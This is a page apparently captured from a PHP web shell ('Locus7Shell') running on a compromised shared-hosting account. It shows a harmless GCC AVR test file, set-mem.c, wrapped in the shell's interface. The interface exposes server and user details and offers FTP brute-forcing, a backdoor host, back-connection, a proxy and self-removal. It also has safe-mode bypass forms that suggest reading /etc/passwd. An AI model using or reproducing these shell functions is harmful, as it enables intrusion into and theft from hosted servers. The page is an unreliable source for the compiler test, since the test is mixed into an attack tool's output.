Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/avr/torture/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     set-mem.c (1.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */

#define NI __attribute__((noinline, noclone))

typedef __INT8_TYPE__ s8;
typedef __INT16_TYPE__ s16;
typedef __int24 s24;
typedef __INT32_TYPE__ s32;

static s8 arr8[3];
static s16 arr16[3];
static s24 arr24[3];
static s32 arr32[3];

NI void set8  (s8  *p) { p[0] = -123; p[1]  = -23; p[2]  = -34; }
NI void set16 (s16 *p) { p[0] = -123; p[1] = -234; p[2] = -345; }
NI void set24 (s24 *p) { p[0] = -123; p[1] = -234; p[2] = -345; }
NI void set32 (s32 *p) { p[0] = -123; p[1] = -234; p[2] = -345; }

void test8 (void)
{
  set8 (arr8);
  if (arr8[0] != -123 || arr8[1] != -23 || arr8[2] != -34)
    __builtin_abort();
}

void test16 (void)
{
  set16 (arr16);
  if (arr16[0] != -123 || arr16[1] != -234 || arr16[2] != -345)
    __builtin_abort();
}

void test24 (void)
{
  set24 (arr24);
  if (arr24[0] != -123 || arr24[1] != -234 || arr24[2] != -345)
    __builtin_abort();
}

void test32 (void)
{
  set32 (arr32);
  if (arr32[0] != -123 || arr32[1] != -234 || arr32[2] != -345)
    __builtin_abort();
}

int main (void)
{
  test8();
  test16();
  test24();
  test32();
  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0067 ]--